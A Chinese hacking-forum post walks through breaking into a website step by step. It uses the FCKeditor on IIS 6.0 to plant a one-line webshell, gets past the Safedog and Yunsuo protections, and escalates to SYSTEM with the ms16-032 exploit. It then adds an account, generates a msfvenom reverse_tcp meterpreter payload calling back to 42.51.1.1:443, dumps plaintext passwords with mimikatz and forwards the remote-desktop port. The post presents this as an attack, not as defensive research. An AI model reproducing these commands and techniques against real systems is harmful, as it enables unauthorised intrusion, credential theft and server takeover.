找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2383|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

$ n- p) N3 f0 r$ X( W

# i+ e( U. v& ]/ @* z: c' j9 h6 [5 r6 @: |5 ^% r6 n1 G' C! K0 O$ m. F4 Z3 m: \5 k7 E ~4 g: d2 ^1 F! A: Y" A# m! m2 a5 \7 L
2 b& ]' \. K' O6 U

+ l9 K9 z3 m" J
* n- {3 a+ C' \* ?& J3 X
一、 利用getwebshell
1 T; R2 f9 z: v
; B3 n0 F$ Q8 q7 A8 @
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
# v! p. \; A- [) h3 Y8 d1 f) U. a
* k* i: ~& i% F) Q8 c 222.png
% U7 l) `4 H3 n4 V& ?2 Y
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
1 ]+ d) x6 M6 O: h" B& T1 x* ^ 333.png
# s- g. _$ M5 u/ X; s& a8 o) X# m3 l
下面我们构造一个asp目录,如: 6 c, A+ G+ t3 Q2 Y. v

+ O+ `2 A1 K* l1 ^7 d

' ^* _) ?: \, ~* r http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 $ a2 F& n& U, W7 L5 P

# S3 E$ K3 s" b, H; R* a

0 t2 W( u7 J/ \: T" }/ E7 ]; v5 D 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
0 t; B; _" L2 }- c. j7 ]- F; u
- Q6 j* n7 f: U& ^7 W0 J3 E
一、 绕过安全狗云锁提权并且加账号
3 ~ s8 X! f. G+ Z7 A0 U3 t 444.png
3 g, G. [' a* H2 J2 j$ X4 d8 t
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
" ~4 h8 U( L, }( e; h
7 X; `3 g+ I5 l, B: _4 g3 }
如图:
% H: Z1 V `9 |5 ?0 `% K2 s5 a3 {555.png
/ L$ S8 y1 T3 b* j: ^" B# N5 k8 ]
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
7 A0 V0 J6 l/ ~/ `6 W0 T
! k, ]2 |, T b
一、 利用metasploit
: I4 S5 r% |/ G) X7 V
# E$ B. N `1 F0 E; N; Z
首先用pentestbox生成一个64位的payload如下命令
* p* V# O) G7 R$ L
7 [4 J8 Z7 g2 r& m& E) Q5 B/ { msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
" }3 z7 [5 i& m, \* E3 h. M. N8 A
; Z5 c- @+ {' }6 L% q9 ?
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
& d/ i3 u0 r% i" Q' d* s& U 11.png
# O; e: s+ h/ S o# ?/ S
下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
# d( A/ A5 C) w; M- P* O 13.png
0 b; K5 \' e5 {' V' ?
下面我们来做一个监听如下命令:
3 q! P2 D8 G. |! A3 e: f
~: n5 d4 E: C& H( u9 `3 x' P: ?. S& O portfwd add -l 6655 -p 3968 -r 127.0.0.1
,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
$ ~: e2 B2 R3 Q9 q# q 18.png
; U4 }. T% A8 R2 y

$ M. ]- Y# d4 Z9 S' ]/ c0 X3 h
# x) I' O" Z5 Z8 T

! j$ ]3 H% P" B2 Z

* W8 i! P: `3 z4 L' B4 y# g/ Q. H
" I( j9 [3 g$ o
$ h! d; E9 s2 I$ V
4 L/ F" t+ D0 R; {& o# [& \1 e. F

6 d% [' d2 K. s3 f# \% ]" O
- z9 m! d1 B5 I1 O ) W5 D2 n: o9 }2 U

7 U. @8 ^2 k; j: z% e
Y8 Y; O! g' A

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表